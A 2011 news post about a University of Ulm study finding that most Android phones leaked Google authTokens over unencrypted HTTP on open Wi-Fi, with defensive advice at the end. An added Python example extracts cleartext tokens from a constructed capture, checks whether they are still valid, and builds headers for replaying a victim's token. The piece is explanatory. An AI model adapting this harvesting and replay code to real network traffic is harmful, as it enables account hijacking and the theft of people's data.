May 19, 2011

Study: 99% of Android phones vulnerable to attack


Bad news for Android users! A study shows that 99 percent of Android phones are vulnerable to a security attack which allows hackers to access their Google accounts.
Researchers at the University of Ulm tested Android versions 2.1, 2.2, 2.2.1, 2.3.3, 2.3.4, and 3.0, and found that devices running anything prior to Android 2.3.4 can easily be compromised with the attack method used. Considering that nearly all Android phones are running software version 2.3.3 and below, this means that about 99 percent of devices are vulnerable.
The way the attack works is that an evildoer on the same open Wi-Fi network as your phone (one without encryption, so anyone in range can read the traffic) simply listens for the phone's sync requests and snatches up its authTokens. An authToken is a secret string your phone obtains with your password and then attaches to every request so the service knows the request is from you; whoever holds the string is treated as you.
Hackers are able to do this because authTokens are not only valid for up to two weeks, but are also sent over unencrypted HTTP connections rather than HTTPS, so they cross the network in plain text.
So what can someone do with your authTokens? He or she can pretend to be you, at least in the eyes of the service that issued the token, and read or change your data there until the token expires.
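What this leak looks like on the wire, as an added example that is not part of the original post or the Ulm team's tooling: the script below walks a simplified, constructed text rendering of what a passive listener on an open Wi-Fi network could record, pulls out every ClientLogin token that was sent over plain HTTP, skips connections that went over TLS (where only ciphertext is visible), and checks whether a captured token is still inside the two-week validity window. The capture format is invented for this example (it is not a pcap), the hosts, paths and token values are made up, and the `Authorization: GoogleLogin auth=...` header is the form ClientLogin tokens take in Google Data API requests.

```python
"""Find Google ClientLogin authTokens that crossed the network in the clear."""
import re
from datetime import datetime, timedelta

# Constructed sample traffic. Each record is a timestamp line followed by the
# request the sync client sent; hosts, paths and token values are made up.
# The port-443 record stands for a connection the listener could NOT read.
SAMPLE_CAPTURE = """\
2011-05-16T09:00:00 192.168.1.7 -> 74.125.0.1:80
GET /calendar/feeds/default/allcalendars/full HTTP/1.1
Host: www.google.com
Authorization: GoogleLogin auth=DQAAAK0AAABnXhJl_EXAMPLE_TOKEN_1
User-Agent: Android-GData/1.0

2011-05-16T09:00:02 192.168.1.7 -> 74.125.0.2:443
<TLS application data, 512 bytes>

2011-05-16T09:01:10 192.168.1.7 -> 74.125.0.3:80
GET /m8/feeds/contacts/default/full HTTP/1.1
Host: www.google.com
Authorization: GoogleLogin auth=DQAAAK0AAABnXhJl_EXAMPLE_TOKEN_2
"""

TOKEN_LIFETIME = timedelta(days=14)  # the "up to two weeks" the report describes

RECORD_HEAD = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+):(\d+)$")
AUTH_HEADER = re.compile(r"^Authorization:\s*GoogleLogin\s+auth=(\S+)", re.M)
HOST_HEADER = re.compile(r"^Host:\s*(\S+)", re.M)


def find_leaked_tokens(capture):
    """Return one dict per authToken observed on an unencrypted (port 80) connection."""
    leaks = []
    for record in re.split(r"\n\s*\n", capture.strip()):
        lines = record.splitlines()
        head = RECORD_HEAD.match(lines[0])
        if head is None:
            continue                      # not a record header we understand
        captured_at, _src, _dst, port = head.groups()
        if port != "80":
            continue                      # TLS: the listener only sees ciphertext
        body = "\n".join(lines[1:])
        token = AUTH_HEADER.search(body)
        if token is None:
            continue                      # cleartext, but no credential in it
        request_line = lines[1].split() if len(lines) > 1 else []
        host = HOST_HEADER.search(body)
        leaks.append({
            "captured_at": datetime.fromisoformat(captured_at),
            "host": host.group(1) if host else "",
            "path": request_line[1] if len(request_line) > 1 else "",
            "token": token.group(1),
        })
    return leaks


def still_valid(leak, now):
    """True while the token is inside its validity window, i.e. still replayable."""
    return now - leak["captured_at"] < TOKEN_LIFETIME


def hijack_headers(leak):
    """Headers an impersonator would attach to reach the same service as the victim.

    The token is a bearer credential: the service cannot tell this request from
    one made by the phone the token was issued to.
    """
    return {"Host": leak["host"], "Authorization": "GoogleLogin auth=" + leak["token"]}


if __name__ == "__main__":
    for leak in find_leaked_tokens(SAMPLE_CAPTURE):
        status = "valid" if still_valid(leak, datetime(2011, 5, 20)) else "expired"
        print(leak["captured_at"], leak["host"] + leak["path"], leak["token"], status)
```

The port check is the whole story of the fix: once the sync client talks to the same endpoints over HTTPS, the second record is all a listener ever sees, and there is nothing to harvest.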
Yes, that's pretty scary, but you shouldn't panic and abandon your Android phone just yet. While nothing is fool-proof, there are steps you can take to protect yourself a little bit. The most important one of those steps: Avoid unprotected, shady, or unknown Wi-Fi networks.
Let me repeat that one more time: Avoid unprotected, shady, or unknown Wi-Fi networks. They're bad news most of the time and it's generally wise to steer clear of them. But if you absolutely must use one, at least "switch off automatic synchronization in the settings menu" of your device. It is the background sync that sends the tokens without you doing anything, so turning it off won't exactly keep you safe, but it does shrink the window in which a listener can grab them.
You should also keep an eye out for Android 2.3.4 updates for your devices, as that release appears to patch up this particular vulnerability by sending the affected sync traffic over HTTPS.
Update: The folks from the University of Ulm have reached out to clarify that it's specifically Google services, such as Calendar, Contacts, and Picasa, which can be hijacked using this particular security attack.
